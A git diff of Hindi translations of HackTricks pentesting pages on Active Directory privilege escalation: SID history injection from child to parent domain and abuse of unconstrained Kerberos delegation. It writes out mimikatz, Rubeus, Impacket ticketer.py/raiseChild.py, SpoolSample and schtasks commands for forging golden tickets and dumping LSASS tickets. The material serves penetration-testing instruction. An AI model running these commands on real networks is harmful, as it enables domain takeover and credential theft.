* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **मुझे** **ट्विटर** पर **फॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**।** * **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड ग्रुप**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम ग्रुप**](https://t.me/peass) या **मुझे** **ट्विटर** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)** पर **फॉलो** करें।
* **अपने हैकिंग ट्रिक्स साझा करें, [हैकट्रिक्स रेपो](https://github.com/carlospolop/hacktricks) और [हैकट्रिक्स-क्लाउड रेपो](https://github.com/carlospolop/hacktricks-cloud) में पीआर जमा करके** * **अपने हैकिंग ट्रिक्स साझा करें, [हैकट्रिक्स रेपो](https://github.com/carlospolop/hacktricks) और [हैकट्रिक्स-क्लाउड रेपो](https://github.com/carlospolop/hacktricks-cloud) में पीआर जमा करके**
</details> </details>
@ -18,10 +18,10 @@
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary> <summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपन**कंपनी को हैकट्रिक्स में विज्ञापित** देखना चाहते हैं? या क्या आप **PEASS के नवीनतम संस्करण या हैकट्रिक्स को पीडीएफ में डाउनलोड** करना चाहते हैं? [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) की जांच करें! * क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप चाहते हैं कि आपक**कंपनी को हैकट्रिक्स में विज्ञापित किया जाए**? या क्या आपको **PEASS के नवीनतम संस्करण या हैकट्रिक्स को पीडीएफ में डाउनलोड करने का एक्सेस चाहिए**? [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) की जांच करें!
* [**द पीएस फैमिली**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**एनएफटी**](https://opensea.io/collection/the-peass-family) संग्रह। * [**द पीएस फैमिली**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**एनएफटी**](https://opensea.io/collection/the-peass-family) संग्रह।
* [**आधिकारिक PEASS और हैकट्रिक्स स्वैग**](https://peass.creator-spring.com) प्राप्त करें। * [**आधिकारिक PEASS और हैकट्रिक्स स्वैग**](https://peass.creator-spring.com) प्राप्त करें।
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **मुझे** **ट्विटर** पर **फॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**।** * **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड ग्रुप**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम ग्रुप**](https://t.me/peass) या **मुझे** **ट्विटर** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)** पर **फॉलो** करें।
* **अपने हैकिंग ट्रिक्स साझा करें, [हैकट्रिक्स रेपो](https://github.com/carlospolop/hacktricks) और [हैकट्रिक्स-क्लाउड रेपो](https://github.com/carlospolop/hacktricks-cloud) में पीआर जमा करके** * **अपने हैकिंग ट्रिक्स साझा करें, [हैकट्रिक्स रेपो](https://github.com/carlospolop/hacktricks) और [हैकट्रिक्स-क्लाउड रेपो](https://github.com/carlospolop/hacktricks-cloud) में पीआर जमा करके**
</details> </details>

View file

@ -4,25 +4,25 @@
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary> <summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* क्या आप किसी **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी कंपनी को **हैकट्रिक्स में विज्ञापित** देखना चाहते हैं? या क्या आपको **PEASS की नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने का उपयोग** करने की आवश्यकता है? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें! * क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी को हैकट्रिक्स में विज्ञापित** देखना चाहते हैं? या क्या आप **PEASS के नवीनतम संस्करण या हैकट्रिक्स को पीडीएफ में डाउनलोड** करना चाहते हैं? [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) की जांच करें!
* खोजें [**The PEASS Family**](https://opensea.io/collection/the-peass-family), हमारा विशेष संग्रह [**NFTs**](https://opensea.io/collection/the-peass-family) * [**द पीएस फैमिली**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**एनएफटी**](https://opensea.io/collection/the-peass-family) संग्रह।
* प्राप्त करें [**आधिकारिक PEASS और HackTricks swag**](https://peass.creator-spring.com) * [**आधिकारिक पीएस और हैकट्रिक्स स्वैग**](https://peass.creator-spring.com) प्राप्त करें।
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या मुझे **ट्विटर** पर **फ़ॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **मुझे** **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **अपने हैकिंग ट्रिक्स को [hacktricks रेपो](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud रेपो](https://github.com/carlospolop/hacktricks-cloud) में पीआर जमा करके साझा करें।** * **अपने हैकिंग ट्रिक्स साझा करें, [हैकट्रिक्स रेपो](https://github.com/carlospolop/hacktricks) और [हैकट्रिक्स-क्लाउड रेपो](https://github.com/carlospolop/hacktricks-cloud) में पीआर जमा करके**।
</details> </details>
## हमला ## हमला
SID इतिहास को प्रबंधित करने के लिए बनाया गया था, जहां एक उपयोगकर्ता को एक डोमेन से दूसरे में ले जाया जाता है। "पुराने" डोमेन में संसाधनों तक पहुंच को सुरक्षित रखने के लिए, उपयोगकर्ता के **पिछले SID को उनके नए खाते के SID इतिहास में जोड़ा जाता है**। इसलिए ऐसे टिकट बनाने पर, माता-पिता डोमेन में एक विशेषाधिकारी समूह (EAs, DAs, आदि) का SID जोड़ा जा सकता है जो **माता-पिता में सभी संसाधनों तक पहुंच प्रदान करेगा**। SID इतिहास को प्राथमिकता दी गई थी ताकि एक उपयोगकर्ता को एक से दूसरे डोमेन में स्थानांतरित किया जा सके। "पुराने" डोमेन में संसाधनों तक पहुंच को संरक्षित रखने के लिए **उपयोगकर्ता के पिछले SID को उनके नए खाते के SID इतिहास में जोड़ा जाता था**। इसलिए ऐसे टिकट बनाते समय, मात्रिक डोमेन में किसी भी विशेषाधिकारी समूह (ईएए, डीए, आदि) का SID जोड़ा जा सकता है जो **मातृ डोमेन में सभी संसाधनों तक पहुंच प्रदान करेगा**।
इसे आप एक [**Golden**](sid-history-injection.md#golden-ticket) या [**Diamond Ticket**](sid-history-injection.md#diamond-ticket) का उपयोग करके प्राप्त कर सकते हैं इसे या तो [**Golden**](sid-history-injection.md#golden-ticket) या [**Diamond Ticket**](sid-history-injection.md#diamond-ticket) का उपयोग करके प्राप्त किया जा सकता है
**"एंटरप्राइज एडमिन्स"** समूह के **SID**ा पता लगाने के लिए आप **रूट डोमेन** के **SID** का पता लगा सकते हैं और इसे `S-1-5-21-<रूट डोमेन>-519` में सेट कर सकते हैं। उदाहरण के लिए, रूट डोमेन SID `S-1-5-21-280534878-1496970234-700767426` से **"एंटरप्राइज एडमिन्स"** समूह SID `S-1-5-21-280534878-1496970234-700767426-519` है। **"एंटरप्राइज एडमिन्स"** समूह के **SID**ो खोजने के लिए आप **मूल डोमेन** का **SID** खोज सकते हैं और इसे `S-1-5-21-<मूल डोमेन>-519` में सेट कर सकते हैं। उदाहरण के लिए, मूल डोमेन SID `S-1-5-21-280534878-1496970234-700767426` समूह **"एंटरप्राइज एडमिन्स"** का SID है `S-1-5-21-280534878-1496970234-700767426-519`
आप यहां **डोमेन एडमिन्स** समूह का भी उपयोग कर सकते हैं, जो **512** से समाप्त होता है। आप **Domain Admins** समूह का भी उपयोग कर सकते हैं, जो **512** में समाप्त होता है।
दूसरे डोमेन के समूह (उदाहरण के लिए "डोमेन एडमिन्स") के SID का पता लगाने का एक और तरीका है: दूसरे डोमेन के समूह का **SID** खोजने का एक और तरीका (उदाहरण के लिए "Domain Admins") यह है:
```powershell ```powershell
Get-DomainGroup -Identity "Domain Admins" -Domain parent.io -Properties ObjectSid Get-DomainGroup -Identity "Domain Admins" -Domain parent.io -Properties ObjectSid
``` ```
@ -53,7 +53,7 @@ mimikatz.exe "kerberos::golden /user:Administrator /domain:<current_domain> /sid
[golden-ticket.md](golden-ticket.md) [golden-ticket.md](golden-ticket.md)
{% endcontent-ref %} {% endcontent-ref %}
### डायमंड टिकट (Rubeus + KRBTGT-AES256) ### डायमंड टिकट (रुबेस + KRBTGT-AES256)
{% code overflow="wrap" %} {% code overflow="wrap" %}
```powershell ```powershell
@ -67,7 +67,7 @@ Rubeus.exe golden /rc4:<krbtgt hash> /domain:<child_domain> /sid:<child_domain_s
``` ```
{% endcode %} {% endcode %}
डायमंड टिकट के बारे में अधिक जानकारी के लिए देखें: डायमंड टिकट्स के बारे में अधिक जानकारी के लिए देखें:
{% content-ref url="diamond-ticket.md" %} {% content-ref url="diamond-ticket.md" %}
[diamond-ticket.md](diamond-ticket.md) [diamond-ticket.md](diamond-ticket.md)
@ -81,7 +81,7 @@ ls \\mcorp-dc.moneycorp.local\c$
``` ```
{% endcode %} {% endcode %}
संकटित डोमेन के KRBTGT हैश का उपयोग करके रूट या एंटरप्राइज एडमिनिस्ट्रेटर तक उन्नत करें: अपने द्वितीयक या रूट या कंप्रोमाइज़्ड डोमेन के KRBTGT हैश का उपयोग करके डीए या एंटरप्राइज़ व्यवस्थापक तक उन्नति करें:
{% code overflow="wrap" %} {% code overflow="wrap" %}
```bash ```bash
@ -97,7 +97,7 @@ schtasks /Run /S mcorp-dc.moneycorp.local /TN "STCheck114"
``` ```
{% endcode %} {% endcode %}
अटैक से प्राप्त अनुमतियों के साथ आप नए डोमेन में उदाहरण के लिए एक DCSync हमला कर सकते हैं: हमले से प्राप्त अनुमतियों के साथ आप नए डोमेन में उदाहरण के रूप में DCSync हमला कर सकते हैं:
{% content-ref url="dcsync.md" %} {% content-ref url="dcsync.md" %}
[dcsync.md](dcsync.md) [dcsync.md](dcsync.md)
@ -105,9 +105,7 @@ schtasks /Run /S mcorp-dc.moneycorp.local /TN "STCheck114"
### लिनक्स से ### लिनक्स से
#### [ticketer.py](https://github.com/SecureAuthCorp/impacket/blob/master/examples/ticketer.py) के साथ मैनुअल #### [ticketer.py](https://github.com/SecureAuthCorp/impacket/blob/master/examples/ticketer.py) के साथ मैन्युअल
{% code overflow="wrap" %}
```bash ```bash
# This is for an attack from child to root domain # This is for an attack from child to root domain
# Get child domain SID # Get child domain SID
@ -129,21 +127,21 @@ psexec.py <child_domain>/Administrator@dc.root.local -k -no-pass -target-ip 10.1
``` ```
{% endcode %} {% endcode %}
#### स्वचालित रूप से [raiseChild.py](https://github.com/SecureAuthCorp/impacket/blob/master/examples/raiseChild.py) का उपयोग करें #### स्वचालित रूप से [raiseChild.py](https://github.com/SecureAuthCorp/impacket/blob/master/examples/raiseChild.py) का उपयोग
यह एक Impacket स्क्रिप्ट है जो **बालक से माता-पिता डोमेन में उन्नति को स्वचालित करेगा**। स्क्रिप्ट को निम्नलिखित चीजों की आवश्यकता होती है: यह एक Impacket स्क्रिप्ट है जो **बच्चे से माता-पिता डोमेन में उन्नति को स्वचालित करेगा**। स्क्रिप्ट को आवश्यकता है:
* लक्षित डोमेन कंट्रोलर * लक्ष्य डोमेन कंट्रोलर
* बालक डोमेन में एक व्यवस्थापक उपयोगकर्ता के लिए Creds * बच्चे डोमेन में एडमिन उपयोगकर्ता के लिए Creds
प्रवाह है: फ्लो इस प्रकार है:
* माता-पिता डोमेन के Enterprise Admins समूह के लिए SID प्राप्त करता है * माता-पिता डोमेन के एंटरप्राइज एडमिन्स समूह के लिए SID प्राप्त करता है
* बालक डोमेन में KRBTGT खाते के लिए हैश प्राप्त करता है * बच्चे डोमेन में KRBTGT खाते के लिए हैश पुनः प्राप्त करता है
* एक Golden Ticket बनाता है * एक Golden Ticket बनाता है
* माता-पिता डोमेन में लॉगन करता है * माता-पिता डोमेन में लॉगिन करता है
* माता-पिता डोमेन में Administrator खाते के लिए प्रमाणपत्र प्राप्त करता है * माता-पिता डोमेन में व्यवस्थापक खाते के लिए क्रेडेंशियल पुनः प्राप्त करता है
* यदि `target-exec` स्विच निर्दिष्ट किया जाता है, तो यह पिता डोमेन के डोमेन कंट्रोलर के माध्यम से Psexec के माध्यम से प्रमाणित करता है। * यदि `target-exec` स्विच निर्दिष्ट किया गया है, तो यह माता-पिता डोमेन के डोमेन कंट्रोलर के माध्यम से Psexec के माध्यम से प्रमाणीकृत होता है।
```bash ```bash
raiseChild.py -target-exec 10.10.10.10 <child_domain>/username raiseChild.py -target-exec 10.10.10.10 <child_domain>/username
``` ```
@ -155,10 +153,10 @@ raiseChild.py -target-exec 10.10.10.10 <child_domain>/username
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary> <summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी कंपनी को **हैकट्रिक्स में विज्ञापित** देखना चाहते हैं? या क्या आपको **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने का उपयोग** करने की आवश्यकता है? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें! * क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का हैकट्रिक्स में विज्ञापित करना चाहते हैं**? या क्या आप **PEASS के नवीनतम संस्करण देखना चाहते हैं या हैकट्रिक्स को पीडीएफ में डाउनलोड करना चाहते हैं**? [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) की जांच करें!
* खोजें [**The PEASS Family**](https://opensea.io/collection/the-peass-family), हमारा विशेष [**NFT**](https://opensea.io/collection/the-peass-family) संग्रह! * [**द पीएस फैमिली**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**एनएफटी**](https://opensea.io/collection/the-peass-family) संग्रह।
* प्राप्त करें [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com) * [**आधिकारिक PEASS और हैकट्रिक्स स्वैग**](https://peass.creator-spring.com) प्राप्त करें।
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में या मुझे **ट्विटर** पर **फ़ॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **मुझे** **ट्विटर** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)** पर **फॉलो** करें।
* **अपने हैकिंग ट्रिक्स को [hacktricks रेपो](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud रेपो](https://github.com/carlospolop/hacktricks-cloud) में पीआर जमा करके साझा करें।** * **अपने हैकिंग ट्रिक्स साझा करें, [हैकट्रिक्स रेपो](https://github.com/carlospolop/hacktricks) और [हैकट्रिक्स-क्लाउड रेपो](https://github.com/carlospolop/hacktricks-cloud) में पीआर जमा करके**।
</details> </details>

View file

@ -1,73 +1,61 @@
# असंविधानिक डिलीगेशन # असीमित डिलीगेशन
<details> <details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary> <summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ हैकट्रिक्स क्लाउड ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 ट्विटर 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ ट्विच 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 यूट्यूब 🎥</strong></a></summary>
* क्या आप किसी **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी कंपनी को **HackTricks में विज्ञापित** देखना चाहते हैं? या क्या आपको **PEASS की नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने का उपयोग** करने की इच्छा है? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें! * क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का विज्ञापन हैकट्रिक्स में** देखना चाहते हैं? या क्या आपको **PEASS के नवीनतम संस्करण या हैकट्रिक्स को पीडीएफ में डाउनलोड करने का एक्सेस** चाहिए? [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) की जाँच करें!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष संग्रह [**NFTs**](https://opensea.io/collection/the-peass-family) * [**दी पीएएस फैमिली**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**एनएफटी**](https://opensea.io/collection/the-peass-family) संग्रह देखें
* [**आधिकारिक PEASS और HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें * [**आधिकारिक पीएएस और हैकट्रिक्स स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में **शामिल हों** या मुझे **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)** का पालन करें**. * **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) **डिस्कॉर्ड समूह** में](https://discord.gg/hRep4RUj7f) या **टेलीग्राम समूह** में शामिल हों](https://t.me/peass) या **मुझे** **ट्विटर** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **अपने हैकिंग ट्रिक्स को [hacktricks रेपो](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud रेपो](https://github.com/carlospolop/hacktricks-cloud) में पीआर जमा करके साझा करें**। * **अपने हैकिंग ट्रिक्स साझा करें, [हैकट्रिक्स रेपो](https://github.com/carlospolop/hacktricks) और [हैकट्रिक्स-क्लाउड रेपो](https://github.com/carlospolop/hacktricks-cloud) में पीआर जमा करके**.
</details> </details>
## असंविधानिक डिलीगेशन ## असीमित डिलीगेशन
यह एक सुविधा है जिसे डोमेन प्रशासक किसी भी **कंप्यूटर** में सेट कर सकता है। फिर, जब भी एक **उपयोगकर्ता लॉगिन** करता है कंप्यूटर पर, उस उपयोगकर्ता के **TGT की एक प्रतिलिपि** DC द्वारा प्रदान किए गए TGS में **भेजी जाएगी और LSASS में मेमोरी में सहेजी जाएगी**। इसलिए, यदि आपके पास मशीन पर प्रशासक विशेषाधिकार हैं, तो आप किसी भी मशीन पर टिकट्स को **डंप कर सकेंगे और उपयोगकर्ताओं का अनुकरण कर सकेंगे** यह एक सुविधा है जो डोमेन प्रशासक किसी **कंप्यूटर** पर सेट कर सकता है। फिर, जब भी कोई **उपयोगकर्ता कंप्यूटर पर लॉगिन करता है**, तो उस उपयोगकर्ता का **एक प्रतिलिपि TGT** DC द्वारा प्रदान किए गए TGS में **भेजी जाएगी और LSASS में मेमोरी में सहेजी जाएगी**। इसलिए, अगर आपके पास मशीन पर प्रशासक विशेषाधिकार हैं, तो आप **टिकट को डंप करके उपयोगकर्ताओं का अनुकरण** कर सकेंगे।
तो यदि डोमेन व्यवस्थापक "असंविधानिक डिलीगेशन" सुविधा सक्रिय करके किसी कंप्यूटर में लॉगिन करता है, और आपके पास उस मशीन में स्थानीय प्रशासक विशेषाधिकार हैं, तो आप कहीं भी टिकट को डंप कर सकेंगे और डोमेन व्यवस्थापक का अनुकरण कर सकेंगे (डोमेन प्राइवेसी). तो यदि डोमेन प्रशासक "असीमित डिलीगेशन" सुविधा सक्रिय करके किसी कंप्यूटर में लॉगिन करता है, और आपके पास उस मशीन में स्थानीय प्रशासक विशेषाधिकार हैं, तो आप टिकट को डंप करके कहीं भी डोमेन प्रशासक का अनुकरण कर सकेंगे (डोमेन प्राइवेस्क)।
आप इस गुण के साथ **कंप्यूटर ऑब्जेक्ट्स ढूंढ सकते हैं** जांचकर कि क्या [userAccountControl](https://msdn.microsoft.com/en-us/library/ms680832\(v=vs.85\).aspx) गुण [ADS\_UF\_TRUSTED\_FOR\_DELEGATION](https://msdn.microsoft.com/en-us/library/aa772300\(v=vs.85\).aspx) को समावेश करता है। आप इसे एक LDAP फ़िल्टर के साथ कर सकते हैं ' (userAccountControl:1.2.840.113556.1.4.803:=524288) ', जो powerview करता है: आप **इस गुणवत्ता वाले कंप्यूटर ऑब्जेक्ट्स को खोज सकते हैं** जांच करके कि [userAccountControl](https://msdn.microsoft.com/en-us/library/ms680832\(v=vs.85\).aspx) विशेषता [ADS\_UF\_TRUSTED\_FOR\_DELEGATION](https://msdn.microsoft.com/en-us/library/aa772300\(v=vs.85\).aspx) शामिल है। आप इसे एलडीएपी फ़िल्टर के साथ कर सकते हैं (userAccountControl:1.2.840.113556.1.4.803:=524288), जो पावरव्यू करता है:
<pre class="language-bash"><code class="lang-bash"># असंविधानिक कंप्यूटरों की सूची <pre class="language-bash"><code class="lang-bash"># असीमित कंप्यूटरों की सूची
## Powerview ## पावरव्यू
Get-NetComputer -Unconstrained #DCs हमेशा दिखाई देते हैं लेकिन privesc के लिए उपयोगी नहीं होते हैं Get-NetComputer -Unconstrained #DCs हमेशा दिखाई देते हैं लेकिन प्राइवेस्क के लिए उपयोगी नहीं हैं
<strong>## ADSearch <strong>## ADSearch
</strong>ADSearch.exe --search "(&#x26;(objectCategory=computer)(userAccountControl:1.2.840.113556.1.4.803:=524288))" --attributes samaccountname,dnshostname,operatingsystem </strong>ADSearch.exe --search "(&#x26;(objectCategory=computer)(userAccountControl:1.2.840.113556.1.4.803:=524288))" --attributes samaccountname,dnshostname,operatingsystem
<strong># Mimikatz के साथ टिकट निर्यात करें <strong># Mimikatz के साथ टिकट निर्यात करें
</strong>privilege::debug </strong>privilege::debug
sekurlsa::tickets /export #सिफारिश की जाती है sekurlsa::tickets /export #सिफारिश की गई तरीका
kerberos::list /export #एक और तरीका kerberos::list /export #एक और तरीका
# लॉगिन की निगरानी करें और नए टिकट निर्यात करें # लॉगिन की निगरानी करें और नए टिकट निर्यात करें
.\Rubeus.exe monitor /targetuser:&#x3C;username> /interval:10 #नए TGT के लिए हर 10 सेकंड में जांचें</code></pre> .\Rubeus.exe monitor /targetuser:&#x3C;username> /interval:10 #10 सेकंड में नए TGTs के लिए हर 10 सेकंड जांचें</code></pre>
**Mimikatz** या **Rubeus** के साथ व्यवस्थापक (या पीड़ित उपयोगकर्ता) का टिकट मेमोरी में लोड करें एक [**पास द टिकट**](pass-the-ticket.md)** के लिए**।\ **Mimikatz** या **Rubeus** के साथ प्रशासक (या पीडित उपयोगकर्ता) का टिकट मेमोरी में लोड करें और [**पास द टिकट**](pass-the-ticket.md) के लिए।\
अधिक जानकारी: [https://www.harmj0y.net/blog/activedirectory/s4u2pwnage/](https://www.harmj0y.net/blog/activedirectory/s4u2pwnage/)\ अधिक जानकारी: [https://www.harmj0y.net/blog/activedirectory/s4u2pwnage/](https://www.harmj0y.net/blog/activedirectory/s4u2pwnage/)\
[**ired.team में असंविधानिक डिलीगेशन के बारे में अधिक जानकारी।**](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/domain-compromise-via-unrestricted-kerberos-delegation) [**असीमित डिलीगेशन के बारे में अधिक जानकारी ired.team में।**](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/domain-compromise-via-unrestricted-kerberos-delegation)
### **प्रमाणीकरण को बलवान बनाएं** ### **बल प्रमाणीकरण**
यदि एक हमलावर किसी कंप्यूटर को "असंविधानिक डिलीगेशन" के लिए अनुमति देने के लिए सक्षम है, तो वह एक **प्रिंट सर्वर** को **स्वचालित रूप से लॉगिन** करने के लिए धोखा दे सकता है और सर्वर की मेमोरी में एक TGT को सहेज सकता है।\ यदि एक हमलावर किसी कंप्यूटर को **"असीमित डिलीगेशन" के लिए अनुमति देने में सक्षम है**, तो वह एक **प्रिंट सर्वर** को **धोखा दे सकता है** कि वह इसके खिलाफ स्वचालित रूप से लॉगिन करेगा और सर्वर की मेमोरी में एक TGT सहेजेगा।\
फिर, हमलावर उपयोगकर्ता प्रिंट सर्वर कंप्यूटर खाते का अनुकरण करने के लिए एक **पास द टिकट हमला** कर सकता है। फिर, हमलावर उपयोगकर्ता प्रिंट सर्वर कंप्यूटर खाते का अनुकरण करने के लिए **पास द टिकट हमला** कर सकता है।
किसी भी मशीन के खिलाफ प्रिंट सर्वर को लॉगिन करने के लिए आप [**SpoolSample किसी भी मशीन के खिलाफ प्रिंट सर्वर लॉगिन करने के लिए आप [**SpoolSample**](https://github.com/leechristensen/SpoolSample) का उपयोग कर सकते हैं:
```bash ```bash
.\SpoolSample.exe <printmachine> <unconstrinedmachine> .\SpoolSample.exe <printmachine> <unconstrinedmachine>
``` ```
यदि TGT एक डोमेन कंट्रोलर से है, तो आप एक [**DCSync हमला**](acl-persistence-abuse/#dcsync) कर सकते हैं और DC से सभी हैश प्राप्त कर सकते हैं।\ यदि TGT एक डोमेन कंट्रोलर से है, तो आप एक **DCSync हमला** कर सकते हैं और DC से सभी हैश प्राप्त कर सकते हैं।\
[**इस हमले के बारे में अधिक जानकारी ired.team में।**](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/domain-compromise-via-dc-print-server-and-kerberos-delegation) [**इस हमले के बारे में अधिक जानकारी ired.team में।**](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/domain-compromise-via-dc-print-server-and-kerberos-delegation)
